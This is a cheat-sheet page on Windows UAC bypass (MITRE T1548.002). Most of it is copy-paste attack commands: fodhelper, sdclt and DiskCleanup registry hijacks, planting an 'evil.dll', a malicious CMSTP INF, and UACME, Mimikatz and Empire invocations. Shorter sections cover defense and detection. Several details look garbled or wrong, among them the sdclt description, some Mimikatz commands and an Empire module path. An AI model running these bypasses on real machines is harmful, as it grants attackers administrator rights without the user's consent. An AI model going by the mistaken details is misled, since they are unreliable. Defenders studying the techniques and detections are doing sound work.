High Severity | T1548.002
🔓 UAC Bypass Techniques
🧠 Description
User Account Control (UAC) is a Windows security feature that requires user confirmation before allowing elevated (administrator) tasks. UAC bypass techniques exploit implementation flaws in Windows components to execute code with elevated privileges without user consent.
Why UAC Bypass Works:
- Auto-Elevation: Trusted Windows binaries can auto-elevate without consent
- DLL Hijacking: High-integrity processes load DLLs from writable locations
- Registry Exploitation: COM objects with vulnerable implementations
- Token Manipulation: Duplicating elevated tokens via COM abuse
UAC Integrity Levels:
- Low: Internet Explorer, sandboxed apps
- Medium: Standard user processes
- High: Administrator with UAC prompt
- System: NT AUTHORITY\SYSTEM
🔍 UAC Enumeration
Check Current UAC Status:
# Check UAC enabled REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System # Check LocalAccountTokenFilterPolicy (1 = admin logs in as medium) REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy # Check FilterAdministratorToken (enables admin for RDP) REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken # Check if current user is admin net user %username% whoami /groups | findstr Admin # Check integrity level whoami /all | findstr Mandatory
Check Auto-Elevate Applications:
# Check which binaries auto-elevate REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" # Check Environment variables PATH for writable directories reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" # Check for World-writable system directories icacls C:\Windows\Temp icacls %TEMP% # Check scheduled tasks schtasks /query /fo LIST /v | findstr /i "Highest"
💣 Bypass Techniques
1. fodhelper.exe (Registry Key Manipulation):
# Create registry key for auto-elevated binary REG ADD "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /d "cmd.exe" /f REG ADD "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /d "" /f # Execute the auto-elevated binary fodhelper.exe # Cleanup REG DELETE "HKCU\Software\Classes\ms-settings" /f
2. sdclt.exe (Controls Sound):
# Another registry-based bypass REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /v "Path" /d "C:\Windows\System32" /f # Execute sdclt.exe # Cleanup REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
3. eventvwr.exe (Weak Binary Path):
# Check if eventvwr.exe loads a DLL from writable path where eventvwr.exe icacls C:\Windows\System32\eventvwr.exe # If MMC.exe is auto-elevated and loads something from writable path # Place your DLL there # Example: mmc.exe loads bginfo.dll from current directory copy evil.dll C:\Windows\System32\bginfo.dll
4. CMSTP.exe (INF File):
# Create malicious INF file [version] Signature=$chicago$ [DefaultInstall] CustomDestinationProvider=CmCustom [CmCustom] runhlp.exe=c:\windows\system32\cmd.exe
5. DiskCleanup Scheduled Task (Registry):
# Register new command REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Actions" /ve /d "calc" /f REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Actions" /v "Level" /d "1" /f # Execute disk cleanup as high integrity cleanmgr.exe /d C: # Cleanup REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Actions" /f
🔐 Using Known UAC Bypass Tools
Mimikatz Bypass Module:
# Mimikatz has built-in UAC bypasses mimikatz.exe privilege::debug misc::misc # Or use elev module misc::elevate # Modern UAC bypass (token) token::elevate /domainadmin # Use ask module (creates prompt in high integrity) ask
UACME Tool:
# UACME has multiple bypass methods # Download from GitHub: hxxps://github.com/hfiref0x/UACME # Method 33 (fodhelper) Akagi64.exe 33 # Method 59 (slui) Akagi64.exe 59 # Method 91 (eventvwr) Akagi64.exe 91 # Execute custom payload Akagi64.exe 33 C:\Windows\System32\cmd.exe
Empire/Covenant:
# Empire UAC bypass module usemodule pruvian/credential_injection/invoke_uac_bypass execute # Covenant UAC bypass Task /uac-bypass # Select method and payload
🛡️ Defense Against UAC Bypass
Disable Auto-Elevation:
# Enable UAC for all applications # Computer Configuration > Policies > Windows Settings > Security Settings > # Local Policies > Security Options > User Account Control: Behavior of the elevation prompt # Set to "Prompt for consent on the secure desktop" or higher # Disable auto-elevation for all Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableInstallerDetection" -Value 1 # Enable secure desktop for prompts Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "PromptOnSecureDesktop" -Value 1
Remove Users from Local Admin Group:
# Best defense is to not be admin # Remove all users from Administrators group Remove-LocalGroupMember -Group "Administrators" -Member "DOMAIN\User" # Add separate admin account for elevation Add-LocalGroupMember -Group "Administrators" -Member "DOMAIN\SpecialAdmin" # Enable Remote UAC REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 0 /f
🔍 Detection
Sysmon Event Monitoring:
# Monitor for UAC bypass artifacts # Event ID 1 - Process Create # Look for: # - eventvwr.exe, fodhelper.exe, sdclt.exe from user directories # - Registry modifications to HKCU\Software\Classes # - child processes of auto-elevated binaries # Sysmon config for UAC bypasseventvwr.exe explorer.exe
Sigma Rules:
title: UAC Bypass via Registry
id: uac-bypass-registry
detection:
selection:
EventID: 13
TargetObject|contains:
- 'ms-settings'
- 'Software\Classes'
condition: selection
level: high
PowerShell Detection:
# Check for suspicious registry entries Get-ItemProperty "HKCU:\Software\Classes\*\shell\open\command" -ErrorAction SilentlyContinue Get-ItemProperty "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -ErrorAction SilentlyContinue # Monitor for new autorun entries Get-WmiObject -Class Win32_StartupCommand | Select-Object Name, Command
💥 Impact
Potential Damage:
- System-Level Access: Bypass UAC to get SYSTEM shell
- Credential Dumping: Access LSASS, SAM database
- Persistence: Create high-integrity backdoors
- Defense Evasion: No user prompt alerts attacker